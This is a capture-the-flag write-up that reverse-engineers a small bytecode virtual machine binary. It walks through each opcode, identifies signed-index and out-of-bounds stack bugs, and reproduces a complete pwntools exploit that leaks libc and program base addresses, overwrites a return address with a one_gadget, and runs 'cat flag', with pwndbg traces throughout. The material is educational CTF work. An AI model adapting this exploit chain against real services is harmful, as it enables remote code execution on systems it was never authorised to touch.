goto LABEL_102;
case 6u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = (int)*((unsigned __int16 *)&v10 + SBYTE2(enc_num)) >> *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
case 7u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) ^ *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 8u:
JUMPOUT(0x1780LL);
case 9u:
if ( v9 > 256 )
exit(0);
if ( BYTE2(enc_num) )
v12[v9] = enc_num;
else
v12[v9] = v10;
++v9;
goto LABEL_102;
case 0xAu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( !v9 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = v12[--v9];
goto LABEL_102;
case 0xBu:
v8 = enc();
if ( v4 == 1 )
index = v8;
goto LABEL_102;
case 0xCu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
v4 = *((_WORD *)&v10 + SBYTE2(enc_num)) == *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
case 0xDu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) * *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 0xEu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 )
exit(0);
*((_WORD *)&v10 + SBYTE1(enc_num)) = *((_WORD *)&v10 + SBYTE2(enc_num));
goto LABEL_102;
case 0xFu:
printf("%d\n", (unsigned __int16)v12[v9]);
goto LABEL_102;
default:
LABEL_8:
exit(0);
}
}
}
puts("[+] MVA is shutting down ...");
return 0LL;
}

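That reads a bit better

Attack plan

Honestly this is a bit of a slog, but the only way forward is to go through each "case" step by step, noting what it does and where it might be vulnerable: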

  • case0: terminate the loop
  • case1: store "enc_num" into v10
#define SBYTE2(x)   SBYTEn(x,  2) /* shift right by 16 bits, then take the low 8 bits as a signed byte */
#define SBYTEn(x, n) (*((int8*)&(x)+n)) /* read the signed byte at (address + n); n = 2 is the third byte */

case 1u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
goto LABEL_8; /* exit */
*((_WORD *)&v10 + SBYTE2(enc_num)) = enc_num; /* v10 looks like it can be overflowed here */
break;
/* writes enc_num at (v10 + SBYTE2(enc_num)) */
  • case2: addition on v10 (the following cases are similar)
case 2u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) + *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
  • case3: subtraction on v10
  • case4: bitwise AND on v10
  • case5: bitwise OR on v10
  • case6: right shift on v10
case 6u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = (int)*((unsigned __int16 *)&v10 + SBYTE2(enc_num)) >> *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
  • case7: XOR on v10
case 7u:                              
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) ^ *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
  • case8: the decompilation is garbage here, so read the assembly
.text:0000000000001780 loc_1780:                               ; DATA XREF: .rodata:jpt_13D6↓o
.text:0000000000001780 mov eax, 0
.text:0000000000001785 call enc
.text:000000000000178A mov [rbp+var_234], eax
.text:0000000000001790 mov eax, [rbp+var_234]
.text:0000000000001796 mov cs:index, eax
.text:000000000000179C jmp loc_1A2B
  • case9: store v10 into v12
__int64 v9; // [rsp+30h] [rbp-230h] /* a negative array index is possible */
__int16 v12[260]; // [rsp+50h] [rbp-210h]

case 9u:
if ( v9 > 256 )
exit(0);
if ( BYTE2(enc_num) )
v12[v9] = enc_num;
else
v12[v9] = v10;
++v9;
goto LABEL_102;
  • case10: load v12 into v10
case 0xAu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( !v9 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = v12[--v9];
goto LABEL_102;
  • case11: call "enc" again and reset index
case 0xBu:
v8 = enc();
if ( v4 == 1 )
index = v8;
goto LABEL_102;
  • case12: compare
case 0xCu:                             
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
v4 = *((_WORD *)&v10 + SBYTE2(enc_num)) == *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
  • case13: multiplication on v10
case 0xDu:                             
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) * *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
  • case14: copy one v10 slot to another
case 0xEu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 )
exit(0);
*((_WORD *)&v10 + SBYTE1(enc_num)) = *((_WORD *)&v10 + SBYTE2(enc_num));
goto LABEL_102;
  • case15: print v12
case 0xFu:
printf("%d\n", (unsigned __int16)v12[v9]);
goto LABEL_102;

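Analysis: "case15" is surely meant for leaking libc_base (perhaps by using case9 to copy v10 into v12 and then case15 to print v12)

Before that, the logic of the function "enc" has to be understood in order to produce a suitable "key". The original code is:

#define HIBYTE(x)   (*((_BYTE*)&(x)+3)) /* for a 4-byte value: keep the most significant (4th) byte */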

__int64 enc()
{
unsigned int key; // [rsp+4h] [rbp-Ch]

key = (*(_DWORD *)((char *)&code + index) << 8) & 0xFF0000 | (*(_DWORD *)((char *)&code + index) >> 8) & 0xFF00 | HIBYTE(*(_DWORD *)((char *)&code + index)) | (*(_DWORD *)((char *)&code + index) << 24);
index += 4; /* consumes 4 bytes per call */
return key;
}

A simplified Python model:

code=9 # input (4 bytes, read as a little-endian dword)
enc_num = ((code << 8) & 0xFF0000) | ((code >> 8) & 0xFF00) | ((code >> 24) & 0xFF)| ((code << 24) & 0xff000000)
key=(enc_num >> 24) & 0xff
print("enc_num="+str(enc_num))
print("key="+str(key))

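After several rounds of testing: the lowest byte of the 4-byte "input" (that is, the first byte in memory) is the "key". That settles the "key" question, but plenty of mysteries remained: the program deliberately splits each 4-byte code into 4 parts by address order, and at this point I did not know why (in hindsight, the expression in "enc" is a 32-bit byte swap, so the four bytes are consumed in memory order)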
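
The byte-order question can be checked directly. The sketch below assumes that IDA's `HIBYTE` on a 32-bit operand selects the most significant byte; under that assumption the shift-and-mask expression in `enc` is exactly a big-endian read of the four code bytes. Both function names are hypothetical.

```python
import struct

def enc_expr(raw):
    """The decompiled expression, applied to a little-endian dword."""
    x = struct.unpack("<I", raw)[0]          # *(_DWORD *)((char *)&code + index)
    return (((x << 8) & 0xFF0000) | ((x >> 8) & 0xFF00)
            | ((x >> 24) & 0xFF)             # HIBYTE(x), assumed to be byte 3
            | ((x << 24) & 0xFF000000))

def enc_bswap(raw):
    """Same result, written as a big-endian read."""
    return struct.unpack(">I", raw)[0]

raw = bytes([0x01, 0x00, 0x12, 0x34])        # key=1, p1=0, p2=0x12, p3=0x34
value = enc_expr(raw)
print(hex(value), "key =", value >> 24)
```

So the first byte in memory ends up as the top byte of `enc_num` (the key), and the remaining three bytes become SBYTE2, SBYTE1 and the low byte.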

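This is as far as I got on my own. The following questions were still open:

  • Controlling v12 for printing (leak libc_base and pro_base)
  • The final attack vector (hook or ret-system)
  • The actual vulnerability (I could roughly work out what the program does, but not where it is exploitable)

Reproducing the official wp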

#!/usr/bin/python3

from pwn import *
context.arch='amd64'

def pack(op:int, p1:int = 0, p2:int = 0, p3:int = 0) -> bytes:
    return (op&0xff).to_bytes(1,'little') + \
           (p1&0xff).to_bytes(1,'little') + \
           (p2&0xff).to_bytes(1,'little') + \
           (p3&0xff).to_bytes(1,'little')

def ldr(val): # v10=p1(offset1)~p2(offset2)~p3(offset3)
    return pack(0x01, 0, val >> 8, val)

def add(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) + *(&v10+p3)
    return pack(0x02, p1, p2, p3)

def sub(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) - *(&v10+p3)
    return pack(0x03, p1, p2, p3)

def shr(p1, p2): # *(&v10+p1)=*(&v10+p1) >> *(&v10+p2)
    return pack(0x06, p1, p2)

def xor(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) ^ *(&v10+p3)
    return pack(0x07, p1, p2, p3)

def push(): # v12=v10(ban "v12=*(&v10+p1)")
    return pack(0x09)

def pop(p1): # *(&v10+p1)=v12
    return pack(0x0a, p1)

def mul(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) * *(&v10+p3)
    return pack(0x0D, p1, p2, p3)

def mv(p1, p2): # *(&v10+p2) = *(&v10+p1)
    return pack(0x0E, p1, p2)

def sh(): # show
    return pack(0x0F)

puts_offset = 0x845ca
puts_leak = (0x38 + 0x268 - 0x224) >> 1
onegadgetlst = [0xe3b2e, 0xe3b31, 0xe3b34]
onegadget = onegadgetlst[0]
toadd = onegadget - puts_offset
stack_leak = (0x268 - 0x224) >> 1
stack_pointer_leak = (0x238 - 0x224) >> 1

tosub = 0x1a799e + 0x308
# tosub = 0x1a399e + 0x308 # debug aslr
tosub = tosub - 0x3000 # no aslr : player environment
tosub = tosub - 0x4000 # aslr : player environment

# - 0x308 + stack_leak - puts + 0x1a799e
pay = ldr(0x1)
pay += mv(0,1)
pay += ldr(tosub&0xffff)
pay += mv(0,3)
pay += mul(4,-puts_leak,1)
pay += mul(5,-stack_leak,1)
pay += sub(0,5,4)
pay += sub(0,0,3)
pay += shr(0,1)
pay += push()

pay += ldr((tosub>>16)&0xffff)
pay += mv(0,3)
pay += mul(4,-puts_leak+1,1)
pay += mul(5,-stack_leak+1,1)
pay += sub(0,5,4)
pay += sub(0,0,3)
pay += shr(0,1)
pay += push()

# onegadget
pay += mul(3,-puts_leak,1)
pay += mul(4,-puts_leak+1,1)
pay += ldr(toadd&0xffff)
pay += add(0,3,0)
pay += push()
pay += ldr(((toadd>>16)&0xffff)+1)
pay += add(0,4,0)
pay += push()
pay += mul(0,-puts_leak+2,1)
pay += push()
pay += pop(3)
pay += pop(4)
pay += pop(5)

pay += pop(1)
pay += pop(2)
pay += ldr(0xffff)
pay += xor(2,0,2)
pay += ldr(1)
pay += add(2,0,2)
pay += mv(2,-stack_pointer_leak)
pay += ldr(0xffff)
pay += xor(1,0,1)
pay += mv(1,-stack_pointer_leak+1)
pay += mv(0,-stack_pointer_leak+2)
pay += mv(0,-stack_pointer_leak+3)
pay += mv(5,0)
pay += push()
pay += mv(4,0)
pay += push()
pay += mv(3,0)
pay += push()
pay += ldr(0)
pay += push()

pay += sh()
print(hex(len(pay)))
assert len(pay) <= 0x100
pay = pay.ljust(0x100,b'\0')

# chance of this exp : about 1230 - 10125 times with 1 flag
# I admit this is an awful exp
while True:
    p=remote('127.0.0.1',9999)
    p.sendafter('\n',pay)
    try:
        p.recvuntil('starting ...\n')
        p.recvline()
        p.recvuntil('down ...\n')
        p.sendline('cat flag')
        res = p.recvline()
        print('[+] flag:', res)
        p.interactive()
        break
    except:
        p.close()
        pass

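Logic in brief:

  • The program splits the "0x100 bytes of code" it reads into "4-byte units"
  • Each unit has 4 parts: key ~ p1 ~ p2 ~ p3. The key selects the "instruction" to execute (the matching entry of the switch-case), and p1 p2 p3 are the operand offsets (used to address data in v10)
  • The program also keeps v10 (the data being operated on, effectively the register file) and v12 (the data being printed, effectively the VM stack)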
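
The instruction format described above can be turned into a tiny disassembler. This is a sketch: the mnemonics for opcodes that have a helper in the official exp (ldr, add, sub, shr, xor, push, pop, mul, mv, show) follow those helpers, while the remaining names (halt, and, or, jmp, jeq, cmp) are labels chosen here for illustration. Opcodes 0x08 and 0x0B call `enc` a second time, so the following 4 bytes are decoded as their operand (the new index).

```python
import struct

MNEMONICS = {
    0x00: "halt", 0x01: "ldr", 0x02: "add", 0x03: "sub",
    0x04: "and", 0x05: "or", 0x06: "shr", 0x07: "xor",
    0x08: "jmp", 0x09: "push", 0x0A: "pop", 0x0B: "jeq",
    0x0C: "cmp", 0x0D: "mul", 0x0E: "mv", 0x0F: "show",
}

def disassemble(code):
    """Linear decode of MVA bytecode into (mnemonic, p1, p2, p3[, target])."""
    out, pc = [], 0
    while pc + 4 <= len(code):
        op, p1, p2, p3 = code[pc:pc + 4]
        pc += 4
        if op > 0x0F:                 # the interpreter leaves its loop here
            break
        ins = [MNEMONICS[op], p1, p2, p3]
        if op in (0x08, 0x0B) and pc + 4 <= len(code):
            ins.append(struct.unpack(">I", code[pc:pc + 4])[0])
            pc += 4
        out.append(tuple(ins))
        if op == 0x00:                # case 0 stops the VM
            break
    return out

sample = bytes([0x01, 0, 0, 0xF4,  0x0E, 0, 0xF6, 0,  0x0F, 0, 0, 0,  0, 0, 0, 0])
for ins in disassemble(sample):
    print(ins)
```

Running a payload through such a decoder before sending it makes it easier to match each debugger snapshot to the instruction that produced it.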

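Vulnerability analysis:

  • v10 is accessed through a (_WORD *) cast (2 bytes per element) although it is declared as an int64 (8 bytes), so a large p1 easily indexes past it
  • The mul instruction does not check p2, so out-of-range data (for example pieces of an address) can end up in *(&v10+p1)
  • The mv instruction does not check whether p2 is negative, so a large byte value makes "SBYTEn" evaluate to a negative index
  • The push instruction keeps performing "++v9", so accesses through "v12" can run past the array

First copy the official helper definitions and attempt a leak (here I follow the approach of an expert on our team):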

pay = push()*8
pay +=sh()+push()+sh()+push()+sh()
pay = pay.ljust(0x100,b'\0')

p.send(pay)

p.recvuntil('[+] MVA is starting ...\n')
a = int(p.recv(6)[:-1])
log.success("a: " + hex(a))
b = int(p.recv(6)[:-1])
log.success("b: " + hex(b))
c = int(p.recv(6)[:-1])
log.success("c: " + hex(c))
d = (c << 32) | (b << 16) | a
log.success("d: " + hex(d))
libc.address = d - 0x223700
log.success("libc.address: " + hex(libc.address))

Each "push" increments "v9", and the "sh" that follows prints the data at "v12[v9]"

  0x55e14e4377fc    mov    rax, qword ptr [rbp - 0x230] /* rax=v9 */
  0x55e14e437803    add    rax, 1 /* rax=rax+1 */
  0x55e14e437807    mov    qword ptr [rbp - 0x230], rax /* v9=rax */
  0x55e14e43780e    jmp    0x55e14e437a2b /* jump back to the top of the loop */

pwndbg> telescope 0x7fff54fd5480
00:0000│  0x7fff54fd5480 ◂— 0x1 /* v9=1 */
01:0008│  0x7fff54fd5488 ◂— 0x1
02:0010│  0x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:0018│  0x7fff54fd5498 ◂— 0x0 /* v11 */
04:0020│  0x7fff54fd54a0 ◂— 0x0 /* v12[0-3] */

pwndbg> telescope 0x7fff54fd5480
00:0000│  0x7fff54fd5480 ◂— 0x2 /* v9=2 */
01:0008│  0x7fff54fd5488 ◂— 0x1
02:0010│  0x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:0018│  0x7fff54fd5498 ◂— 0x0 /* v11 */
04:0020│  0x7fff54fd54a0 ◂— 0x0 /* v12[0-3] */
05:0028│  0x7fff54fd54a8 ◂— 0x1 /* v12[4-7] */
06:0030│  0x7fff54fd54b0 —▸ 0x7f518679a700 —▸ 0x7f518679a190 —▸ 0x55e14e436000 ◂— 0x10102464c457f /* v12[8-11](target) */
07:0038│  0x7fff54fd54b8 —▸ 0x7f518676a680 ◂— 0x7f518676a680
  • v9 = 8 :
pwndbg> telescope 0x7fff54fd5480
00:0000│  0x7fff54fd5480 ◂— 0x8 /* v9=8 */
01:0008│  0x7fff54fd5488 ◂— 0x1
02:0010│  0x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:0018│  0x7fff54fd5498 ◂— 0x0 /* v11 */
... ↓ 2 skipped
06:0030│  0x7fff54fd54b0 —▸ 0x7f518679a700 —▸ 0x7f518679a190 —▸ 0x55e14e436000 ◂— 0x10102464c457f /* v12[8-11](target) */

0x55e14e437a20    call   printf@plt                <printf@plt>
format: 0x55e14e43804a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0xa700 /* v12[8] */
  • v9 = 9 :
pwndbg> telescope 0x7fff54fd5480
00:0000│  0x7fff54fd5480 ◂— 9 /* v9=9 */
01:0008│  0x7fff54fd5488 ◂— 0x1
02:0010│  0x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:0018│  0x7fff54fd5498 ◂— 0x0 /* v11 */
... ↓ 2 skipped
06:0030│  0x7fff54fd54b0 —▸ 0x7f5186790000 ◂— 's (%s%%)\n' /* v12[8-11](target) */
07:0038│  0x7fff54fd54b8 —▸ 0x7f518676a680 ◂— 0x7f518676a680

0x55e14e437a20    call   printf@plt                <printf@plt>
format: 0x55e14e43804a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x8679 /* v12[9] */
  • v9 = 10 :
pwndbg> telescope 0x7fff54fd5480
00:0000│  0x7fff54fd5480 ◂— 0xa /* v9=10 */
01:0008│  0x7fff54fd5488 ◂— 0x1
02:0010│  0x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:0018│  0x7fff54fd5498 ◂— 0x0 /* v11 */
... ↓ 2 skipped
06:0030│  0x7fff54fd54b0 ◂— 0x7f5100000000 /* v12[8-11](target) */
07:0038│  0x7fff54fd54b8 —▸ 0x7f518676a680 ◂— 0x7f518676a680

0x55e14e437a20    call   printf@plt                <printf@plt>
format: 0x55e14e43804a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x7f51 /* v12[10] */
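
The three `%d` prints above carry one pointer in 16-bit pieces, least significant first. A small sketch of the reassembly, using the values from this debugging session and the 0x223700 offset from the leak script; `parse_show_output` and `join_words` are hypothetical helper names, and splitting on newlines is used here instead of fixed-size `recv(6)` reads so that values with fewer than five decimal digits are also handled.

```python
def parse_show_output(data):
    """Turn the VM's "%d\\n" output into a list of integers."""
    return [int(line) for line in data.split(b"\n") if line.strip()]

def join_words(words):
    """Combine 16-bit words (least significant first) into one integer."""
    value = 0
    for i, word in enumerate(words):
        value |= (word & 0xFFFF) << (16 * i)
    return value

# 0xa700, 0x8679 and 0x7f51 as printed by the three sh() instructions.
output = b"42752\n34425\n32593\n"
leak = join_words(parse_show_output(output))
libc_base = leak - 0x223700

print(hex(leak), hex(libc_base))
```

The resulting base, 0x7f5186577000, is page-aligned, which is a quick sanity check that the offset fits this run.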

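libc_base is leaked. Next comes the code that leaks pro_base (note that ldr is called here with three operands, ldr(p1, p2, p3), unlike the one-argument helper in the official exp):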

pay = push() # not needed, only here to make debugging easier
pay += ldr(0,0,0xf4) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
pay += sh() + push() + sh() + push() + sh()
pay = pay.ljust(0x100, b'\x00')

p.send(pay)

p.recvuntil('[+] MVA is starting ...\n')
a = int(p.recv(6)[:-1])
log.success("a: " + hex(a))
b = int(p.recv(6)[:-1])
log.success("b: " + hex(b))
c = int(p.recv(6)[:-1])
log.success("c: " + hex(c))
d = (c << 32) | (b << 16) | a
log.success("d: " + hex(d))
elfbase = d - 0x1a70
log.success("elfbase: " + hex(elfbase))

pwndbg> telescope 0x7ffcefc61160
00:0000│  0x7ffcefc61160 ◂— 0x1 /* v9=1 */
01:0008│  0x7ffcefc61168 ◂— 0x1
02:0010│  0x7ffcefc61170 ◂— 0x6aa66cd4 /* v10 */
03:0018│  0x7ffcefc61178 ◂— 0x0 /* v11 */
04:0020│  0x7ffcefc61180 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffcefc61188 ◂— 0x1
06:0030│  0x7ffcefc61190 —▸ 0x7f406df3e700 —▸ 0x7f406df3e190 —▸ 0x564995599000 ◂— 0x10102464c457f
07:0038│  0x7ffcefc61198 —▸ 0x7f406df0e680 ◂— 0x7f406df0e680
  • After the 4 ldr instructions:
pwndbg> telescope 0x7ffcefc61160
00:0000│  0x7ffcefc61160 ◂— 0x1 /* v9=1 */
01:0008│  0x7ffcefc61168 ◂— 0x1
02:0010│  0x7ffcefc61170 ◂— 0xf46aa66cd4 /* v10[0]:f4 */
03:0018│  0x7ffcefc61178 ◂— 0x80000000 /* v10[3]:0x8000 */
04:0020│  0x7ffcefc61180 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffcefc61188 ◂— 0x1
06:0030│  0x7ffcefc61190 —▸ 0x7f406df3e700 —▸ 0x7f406df3e190 —▸ 0x564995599000 ◂— 0x10102464c457f
07:0038│  0x7ffcefc61198 —▸ 0x7f406df0e680 ◂— 0x7f406df0e680

pwndbg> x/20xw 0x7ffcefc61170 /* v10 is accessed as 2-byte words (mind the little-endian layout) */
0x7ffcefc61170: 0x6aa66cd4 0x000000f4 0x80000000 0x00000000
0x7ffcefc61180: 0x00000000 0x00000000 0x00000001 0x00000000
  • After the 4 mv instructions:
pwndbg> telescope 0x7ffcefc61160
00:0000│  0x7ffcefc61160 ◂— 0x80000000000000f4 /* v9 */
01:0008│  0x7ffcefc61168 ◂— 0x1 /* v10 */
02:0010│  0x7ffcefc61170 ◂— 0xf46aa66cd4
03:0018│  0x7ffcefc61178 ◂— 0x80000000
04:0020│  0x7ffcefc61180 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffcefc61188 ◂— 0x1
06:0030│  0x7ffcefc61190 —▸ 0x7f406df3e700 —▸ 0x7f406df3e190 —▸ 0x564995599000 ◂— 0x10102464c457f
07:0038│  0x7ffcefc61198 —▸ 0x7f406df0e680 ◂— 0x7f406df0e680

pwndbg> x/20xw 0x7ffcefc61160 
0x7ffcefc61160: 0x000000f4 0x80000000 0x00000001 0x00000000
0x7ffcefc61170: 0x6aa66cd4 0x000000f4 0x80000000 0x00000000
/* v10[0] to v10[-10] */
/* v10[3] to v10[-7] */

v9 now holds an abnormal value. Here is why:

#define SBYTEn(x, n)   (*((int8*)&(x)+n))
#define SBYTE1(x) SBYTEn(x, 1)
#define SBYTE2(x) SBYTEn(x, 2)

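Because "SBYTE1" and "SBYTE2" read an "int8", "0xf6" is interpreted as "-10", "0xf7" as "-9", and so on

As a result, "v10[0]" and "v10[3]" are written to "v10[-10]" and "v10[-7]" respectively (with the two zero words going in between), which overwrites "v9"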
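
The arithmetic behind this can be spelled out with the frame offsets from the decompiler comments (v10 at rbp-0x21C, v9 at rbp-0x230). The sketch below models only the check in case 0xE and the resulting write position; the function names are hypothetical.

```python
V10_OFF = -0x21C   # v10, rbp-relative (from the decompiler comment)
V9_OFF = -0x230    # v9, rbp-relative

def sbyte(b):
    """Interpret one byte as int8, like SBYTEn does."""
    return b - 0x100 if b & 0x80 else b

def mv_check_passes(p2):
    """case 0xE only tests SBYTE1(enc_num) > 5; the sign bit is not rejected."""
    return not sbyte(p2) > 5

def word_slot_offset(p):
    """rbp-relative offset of *((_WORD *)&v10 + p)."""
    return V10_OFF + 2 * sbyte(p)

for p in (0xF6, 0xF7, 0xF8, 0xF9):
    print(hex(p), sbyte(p), mv_check_passes(p), hex(word_slot_offset(p) - V9_OFF))
```

The four destination operands 0xf6 to 0xf9 land at byte offsets 0, 2, 4 and 6 of v9, so together the four mv instructions rewrite the whole 64-bit value.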

  • v9 = 0x80000000000000f4
0x56499559aa20    call   printf@plt                <printf@plt>
format: 0x56499559b04a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0xaa70

In [5]: 0x80000000000000f4*2
Out[5]: 18446744073709552104

In [6]: 0x7ffcefc61180+18446744073709552104
Out[6]: 18446884798040773480

In [7]: hex(18446884798040773480) /* the bits above 64 overflow and are simply discarded */
Out[7]: '0x100007ffcefc61368'

pwndbg> telescope 0x7ffcefc61368 /* the target data is here */
00:0000│     0x7ffcefc61368 ◂— 0x56499559aa70 /* v12[0x80000000000000f4] */
01:0008│     0x7ffcefc61370 ◂— 0x0
02:0010│     0x7ffcefc61378 —▸ 0x56499559a100 ◂— endbr64
03:0018│     0x7ffcefc61380 —▸ 0x7ffcefc61480 ◂— 0x1
04:0020│     0x7ffcefc61388 ◂— 0x39d2b6d7df852f00
05:0028│ rbp 0x7ffcefc61390 ◂— 0x0
  • v9 = 0x80000000000000f5
0x56499559aa20    call   printf@plt                <printf@plt>
format: 0x56499559b04a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x9559

pwndbg> telescope 0x7ffcefc61368
00:0000│     0x7ffcefc61368 ◂— 0x5649955900f4 /* v12[0x80000000000000f5] */
01:0008│     0x7ffcefc61370 ◂— 0x0
02:0010│     0x7ffcefc61378 —▸ 0x56499559a100 ◂— endbr64
03:0018│     0x7ffcefc61380 —▸ 0x7ffcefc61480 ◂— 0x1
04:0020│     0x7ffcefc61388 ◂— 0x39d2b6d7df852f00
05:0028│ rbp 0x7ffcefc61390 ◂— 0x0
  • v9 = 0x80000000000000f6
0x56499559aa20    call   printf@plt                <printf@plt>
format: 0x56499559b04a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x5649

pwndbg> telescope 0x7ffcefc61368
00:0000│     0x7ffcefc61368 ◂— 0x564900f400f4 /* v12[0x80000000000000f6] */
01:0008│     0x7ffcefc61370 ◂— 0x0
02:0010│     0x7ffcefc61378 —▸ 0x56499559a100 ◂— endbr64
03:0018│     0x7ffcefc61380 —▸ 0x7ffcefc61480 ◂— 0x1
04:0020│     0x7ffcefc61388 ◂— 0x39d2b6d7df852f00
05:0028│ rbp 0x7ffcefc61390 ◂— 0x0
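
The reason for setting the top bit of v9 can be shown with 64-bit arithmetic: as a signed `__int64` the value is negative, so it passes the `v9 > 256` test in push, while the multiplication by 2 for the `__int16` element size shifts that bit out again. A minimal sketch using the addresses from this session (`as_int64` and `v12_slot` are hypothetical helper names):

```python
MASK64 = (1 << 64) - 1

def as_int64(value):
    """Reinterpret a 64-bit pattern as a signed integer."""
    value &= MASK64
    return value - (1 << 64) if value >> 63 else value

def v12_slot(v12_addr, v9):
    """Address of v12[v9] for an __int16 array, with 64-bit wrap-around."""
    return (v12_addr + 2 * v9) & MASK64

v9 = 0x80000000000000F4
print(as_int64(v9) > 256)                     # False: the bounds check passes
print(hex(v12_slot(0x7FFCEFC61180, v9)))      # 0x7ffcefc61368
```

Only the low bits of v9 matter for the final address, so 0xf4 selects a slot 0x1e8 bytes past the start of v12, beyond the end of the array.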

pro_base is leaked, which completes the leaks. Next the ret address has to be overwritten so that main runs again:

pay =  push() # not needed, only here to make debugging easier
pay += ldr(0,0,0xff) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
pay += pop(0) + sh() + pop(1) + sh()
pay += ldr(2,1,0xe) + ldr(3,0,0) + ldr(4,0,0) + ldr(5,0x80,0)
pay += mv(2,0xf6) + mv(3,0xf7) + mv(4,0xf8) + mv(5,0xf9) + push()
pay += mv(1,0) + pop(1) + pop(1) + push()
pay += ldr(0,0x51,0) + pop(1) + pop(1) + push()

pay = pay.ljust(0x100-1, b'\x00')

p.send(pay)
  • After the 4 ldr and 4 mv instructions:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x80000000000000ff /* v9 */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0xff9165dcd4 /* v10[start] */
03:0018│  0x7ffd83e7d068 ◂— 0x80000000 /* v11 */
04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
  • First pop:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x80000000000000fe /* v9=0x80000000000000fe */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0x56069165dcd4 /* v10[0]=0x5606 */
03:0018│  0x7ffd83e7d068 ◂— 0x80000000
